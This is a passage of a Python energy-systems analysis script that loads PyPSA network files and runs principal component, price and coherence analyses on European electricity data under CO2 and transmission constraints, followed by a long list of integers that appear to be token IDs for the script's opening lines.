SavePlot(fig, pathCovariance, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance between mismatch and response as a function of CO2 constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance app (CO2)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
# ------------------ Change in contribution and response transmission ----------------------- #
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
for file in filename_trans:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Contribution Elec
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
lambdaContributionElec.append(lambdaCollectedConElec)
# Response Elec
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
lambdaResponseElec.append(lambdaCollectedResElec)
# Covariance Elec
covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec,eigenVectorsElec)
lambdaCovarianceElec.append(covMatrix.T)
# general terms
pathContibution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of transmission constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont (trans)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of transmission constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont app (trans)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity response as a function of transmission constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity response as a function of transmission constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of transmission constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of transmission constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance as a function of transmission constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance (trans)"
SavePlot(fig, pathCovariance, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance as a function of transmission constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance app (trans)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
##############################################################################
##############################################################################
################################ NODAL PRICE #################################
##############################################################################
##############################################################################
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# ----------------------- Map PC Plot (Elec + Heat) --------------------#
# Path to save plots
path = figurePath + "Nodal Price\\Map PC\\"
# --- Elec ---
# Prices for electricity for each country (restricted to 1000 โฌ/MWh)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Plot map PC for electricity nodal prices
titlePlotElec = "Nodal price for electricity only"
for i in np.arange(6):
fig = MAP(eigenVectorsElec, eigenValuesElec, dataNames, (i + 1),size="medium")#, titlePlotElec, titleFileName)
title = (file[12:-3] + " - Map PC Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------------ FFT Plot (Elec + Heat) -----------------------#
# Path to save FFT plots
path = figurePath + "Nodal Price\\FFT\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
fig = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = i+1, title=file_name)
title = (file[12:-3] + " - FFT Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ----------------------- Seasonal Plot (Elec + Heat) ------------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Seasonal\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
fig = seasonPlot(TElec, timeIndex, PC_NO=(i+1), PC_amount=6, title=file_name)
title = (file[12:-3] + " - Seasonal Plot Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Timeseries\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
fig = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=(i+1), PC_amount=6,dpi=200)
title = (file[12:-3] + " - Timeseries Plot Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Nodal Price\\Combined Plot\\"
# --- Elec ---
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withoutProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec NP (lambda 1 & 2)")
SavePlot(fig, path, title)
#%%
# ---------------------- Bar plot CO2 constraint --------------------------- #
# Path to save bar plots
path = figurePath + "Nodal Price\\Bar\\"
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# Variable to store nodal price PC componentns for each network
barMatrixCO2Elec = []
# Variable to store nodal price mean and standard variation
meanPriceElec = []
stdMeanPriceElec = []
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_CO2:
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# --- Elec ---
# Prices for electricity for each country (restricted to 1000 โฌ/MWh)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Append value to matrix
barMatrixCO2Elec.append(varianceExplainedElec)
# ----------------------- NP Mean (Elec) --------------------#
# --- Elec ---
# Mean price for country
minPrice = priceElec.min().mean()
meanPrice = priceElec.mean().mean()
# append min, max and mean to matrix
meanPriceElec.append([minPrice, meanPrice])
# ----------------------- NP Quantile (Elec) --------------------#
# --- Elec ---
# Mean price for country
quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
# append min, max and mean to matrix
quantileMeanPriceElec.append(quantileMeanPrice)
quantileMinPriceElec.append(quantileMinPrice)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "" #"$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec NP")
SavePlot(fig, path, titleBarCO2Elec)
# ----------------------- Price evalution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evalution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3], fontsize=16)
title = (file[12:-14] + " - Elec NP CO2 Evolution")
SavePlot(fig, path, title)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Path
path = figurePath + "Nodal Price\\Bar\\"
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# Variable to store nodal price PC componentns for each network
barMatrixTransmissionElec = []
# Variable to store nodal price mean and standard variation
meanPriceElec = []
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_trans:
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# --- Elec ---
# Prices for electricity for each country (restricted to 1000 โฌ/MWh)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Append value to matrix
barMatrixTransmissionElec.append(varianceExplainedElec)
# ----------------------- NP Mean (Elec) --------------------#
# --- Elec ---
# Mean price for country
minPrice = priceElec.min().mean()
meanPrice = priceElec.mean().mean()
# append min, max and mean to matrix
meanPriceElec.append([minPrice, meanPrice])
# ----------------------- NP Quantile (Elec) --------------------#
# --- Elec ---
# Mean price for country
quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
# append min, max and mean to matrix
quantileMeanPriceElec.append(quantileMeanPrice)
quantileMinPriceElec.append(quantileMinPrice)
# ----------------------- Bar plot (Elec) --------------------#
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = "" #"Number of PC describing variance of network as a function of transmission constraint"
xlabel = "" #"Transmission constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec NP")
SavePlot(fig, path, titleBarTransmissionElec)
# ----------------------- Price evalution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evalution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3.2], fontsize=16)
title = (file[12:-14] + " - Elec NP Trans Evolution")
SavePlot(fig, path, title)
#%%
##############################################################################
##############################################################################
################################# Coherence ##################################
##############################################################################
##############################################################################
# -------------------- Coherence Plot (Elec + Heat) ---------------------#
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Path to save contribution plots
path = figurePath + "Coherence\\"
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# Prices for each country
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# Coherence between prices and mismatch
c1Elec, c2Elec, c3Elec = Coherence(mismatchElec, priceElec)
# Plot properties
title1 = "" #"Coherence 1: Electricity mismatch and nodal price"
title2 = "" #"Coherence 2: Electricity mismatch and nodal price"
title3 = "" #"Coherence 3: Electricity mismatch and nodal price"
xlabel = "Electricity Mismatch"
ylabel="Electricity Prices"
noX = 6
noY = 6
fig1 = CoherencePlot(dataMatrix=c1Elec.T, รผbertitle="", title=title1, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig2 = CoherencePlot(dataMatrix=c2Elec.T, รผbertitle="", title=title2, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig3 = CoherencePlot(dataMatrix=c3Elec.T, รผbertitle="", title=title3, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[-1,1])
SavePlot(fig1, path, title = (file[12:-3] + " - C1 elec mismatch and ENP"))
SavePlot(fig2, path, title = (file[12:-3] + " - C2 elec mismatch and ENP"))
SavePlot(fig3, path, title = (file[12:-3] + " - C3 elec mismatch and ENP"))
# Combined Plot
fig = CoherencePlotCombined(c1Elec.T, c2Elec.T, c3Elec.T, xlabel=xlabel, ylabel=ylabel)
SavePlot(fig, path, title = (file[12:-3] + " - C123 combined elec mismatch and ENP"))
# Finish timer
t1 = time.time() # End timer
total_time = round(t1-t0)
total_time_min = math.floor(total_time/60)
total_time_sec = round(total_time-(total_time_min*60))
print("\n \nThe code is now done running. It took %s min and %s sec." %(total_time_min,total_time_sec))
| [
2,
17267,
12782,
198,
11748,
28686,
198,
11748,
25064,
198,
11748,
12972,
862,
64,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
19798,
292,
355,
279,
67,
198,
2,
6738,
10558,
88,
1330,
47038,
198,
198,
11748,
640,
198,
11748,
10688,
198,
198,
2,
5045,
263,
198,
83,
15,
796,
640,
13,
2435,
3419,
1303,
7253,
257,
19781,
198,
198,
2,
17267,
5499,
2393,
198,
17597,
13,
6978,
13,
33295,
7,
418,
13,
6978,
13,
35312,
7,
418,
13,
1136,
66,
16993,
28955,
58,
15,
12962,
198,
6738,
5499,
62,
7753,
1330,
1635,
220,
220,
220,
220,
220,
220,
220,
220,
220,
628,
198,
2,
27387,
286,
2393,
198,
2,
34945,
796,
28686,
13,
6978,
13,
35312,
7,
418,
13,
6978,
13,
35312,
7,
418,
13,
6978,
13,
35312,
7,
418,
13,
1136,
66,
16993,
28955,
58,
15,
12962,
58,
15,
12962,
58,
15,
60,
1343,
366,
6852,
6601,
6852,
11129,
66,
62,
8807,
6852,
1,
198,
34945,
796,
28686,
13,
6978,
13,
35312,
7,
418,
13,
6978,
13,
35312,
7,
418,
13,
1136,
66,
16993,
28955,
58,
15,
12962,
58,
15,
60,
1343,
366,
6852,
6601,
6852,
11129,
66,
62,
8807,
6852,
1,
198,
198,
2,
9220,
1438,
198,
7753,
796,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
1,
198,
198,
2,
42044,
2393,
1438,
198,
7839,
8979,
5376,
796,
2393,
198,
198,
2,
11291,
3108,
198,
2,
26875,
15235,
796,
28686,
13,
6978,
13,
35312,
7,
418,
13,
6978,
13,
35312,
7,
418,
13,
6978,
13,
35312,
7,
418,
13,
1136,
66,
16993,
28955,
58,
15,
12962,
58,
15,
12962,
58,
15,
60,
1343,
366,
6852,
14989,
942,
6852,
11129,
66,
62,
8807,
6852,
1,
198,
26875,
15235,
796,
28686,
13,
6978,
13,
35312,
7,
418,
13,
6978,
13,
35312,
7,
418,
13,
1136,
66,
16993,
28955,
58,
15,
12962,
58,
15,
60,
1343,
366,
6852,
14989,
942,
6852,
11129,
66,
62,
8807,
6852,
1,
628,
198,
198,
29113,
29113,
7804,
4242,
2235,
198,
29113,
29113,
7804,
4242,
2235,
198,
198,
29113,
2,
3771,
14691,
1303,
14468,
7804,
4242,
2235,
198,
198,
29113,
29113,
7804,
4242,
2235,
198,
29113,
29113,
7804,
4242,
2235,
198,
198,
2,
34400,
6329,
19569,
603,
434,
532,
7375,
17,
17778,
357,
28827,
66,
8,
34400,
438,
2,
198,
2,
10644,
284,
3613,
3696,
198,
6978,
796,
3785,
15235,
1343,
366,
6719,
14691,
6852,
1,
198,
198,
2,
7343,
286,
2393,
3891,
198,
34345,
62,
8220,
17,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
21,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
20,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
19,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
18,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
17,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
16,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
8973,
198,
198,
2,
7343,
286,
17778,
198,
1102,
2536,
6003,
796,
14631,
1821,
4,
1600,
366,
1120,
4,
1600,
366,
1899,
4,
1600,
366,
2154,
4,
1600,
366,
1795,
4,
1600,
366,
3829,
4,
1600,
366,
3865,
4,
8973,
198,
7839,
796,
13538,
2,
1,
44132,
414,
19569,
603,
434,
532,
366,
1343,
2393,
58,
1065,
21912,
1415,
60,
198,
5647,
796,
19569,
603,
434,
7,
34945,
28,
34945,
11,
3696,
28,
34345,
62,
8220,
17,
11,
3670,
28,
7839,
11,
17778,
28,
1102,
2536,
6003,
11,
10369,
7857,
28,
1415,
11,
331,
2475,
41888,
12,
16,
11,
1238,
4357,
2336,
7857,
41888,
21,
11,
604,
13,
20,
12962,
198,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
16193,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
19569,
603,
434,
15987,
66,
357,
8220,
17,
16725,
4008,
628,
198,
198,
2,
220,
24305,
19569,
603,
434,
532,
41653,
17778,
357,
28827,
66,
8,
220,
26171,
2,
198,
198,
2,
7343,
286,
2393,
3891,
198,
34345,
62,
7645,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
3312,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
22318,
62,
15,
13,
2713,
13,
71,
20,
8973,
198,
198,
2,
7343,
286,
17778,
198,
1102,
2536,
6003,
796,
14631,
28667,
1600,
366,
11297,
1600,
366,
17,
87,
9236,
1600,
366,
19,
87,
9236,
1600,
366,
21,
87,
9236,
8973,
198,
7839,
796,
13538,
2,
1,
44132,
414,
19569,
603,
434,
532,
366,
1343,
2393,
58,
1065,
21912,
1415,
60,
198,
198,
5647,
796,
19569,
603,
434,
7,
34945,
28,
34945,
11,
3696,
28,
34345,
62,
7645,
11,
3670,
28,
7839,
11,
17778,
28,
1102,
2536,
6003,
11,
10369,
7857,
28,
1415,
11,
13179,
10779,
1558,
13,
20,
11,
331,
2475,
41888,
12,
17,
11,
1899,
4357,
8177,
33711,
2625,
45828,
826,
1600,
2336,
7857,
41888,
21,
11,
604,
13,
23,
12962,
198,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
16193,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
19569,
603,
434,
15987,
66,
357,
7645,
16725,
4008,
628,
198,
198,
29113,
29113,
7804,
4242,
2235,
198,
29113,
29113,
7804,
4242,
2235,
198,
198,
29113,
21017,
337,
31125,
11417,
1303,
29113,
198,
198,
29113,
29113,
7804,
4242,
2235,
198,
29113,
29113,
7804,
4242,
2235,
198,
198,
2,
35656,
42048,
4635,
416,
3037,
357,
28827,
66,
7375,
17,
290,
3602,
8,
24200,
6329,
2,
198,
2,
10644,
284,
3613,
3696,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
1,
198,
198,
2,
7343,
286,
2393,
3891,
198,
34345,
62,
8220,
17,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
21,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
20,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
19,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
18,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
17,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
16,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
8973,
198,
198,
2,
7343,
286,
17778,
198,
1102,
2536,
6003,
796,
14631,
1821,
4,
1600,
366,
1120,
4,
1600,
366,
1899,
4,
1600,
366,
2154,
4,
1600,
366,
1795,
4,
1600,
366,
3829,
4,
1600,
366,
3865,
4,
8973,
198,
198,
5647,
796,
15987,
66,
35027,
46,
47443,
7,
34945,
28,
34945,
11,
1226,
268,
1047,
28,
34345,
62,
8220,
17,
11,
17778,
28,
1102,
2536,
6003,
11,
10369,
7857,
28,
1415,
11,
220,
2336,
7857,
41888,
21,
11,
21,
12962,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
16193,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
2472,
9766,
66,
5270,
357,
8220,
17,
16725,
4008,
628,
628,
198,
2,
7343,
286,
2393,
3891,
198,
34345,
62,
7645,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
3312,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
22318,
62,
15,
13,
2713,
13,
71,
20,
8973,
198,
198,
2,
7343,
286,
17778,
198,
1102,
2536,
6003,
796,
14631,
28667,
1600,
366,
11297,
1600,
366,
17,
87,
9236,
1600,
366,
19,
87,
9236,
1600,
366,
21,
87,
9236,
8973,
198,
198,
5647,
796,
15987,
66,
35027,
46,
47443,
7,
34945,
28,
34945,
11,
1226,
268,
1047,
28,
34345,
62,
7645,
11,
17778,
28,
1102,
2536,
6003,
11,
13179,
10779,
1495,
11,
10369,
7857,
28,
1415,
11,
2336,
7857,
41888,
21,
11,
21,
13,
18,
12962,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
16193,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
2472,
9766,
66,
5270,
357,
7645,
16725,
4008,
628,
198,
198,
2,
34400,
438,
9347,
29765,
1345,
1747,
357,
28827,
66,
8,
34400,
438,
2,
198,
2,
10644,
284,
3613,
3696,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
13912,
29765,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
2,
17267,
3127,
198,
27349,
796,
12972,
862,
64,
13,
26245,
7,
34945,
10,
7753,
8,
198,
5647,
16,
11,
2336,
17,
11,
2336,
18,
796,
9347,
15610,
4355,
20556,
7,
27349,
11,
3670,
8979,
5376,
11,
299,
4033,
28,
18,
8,
198,
16928,
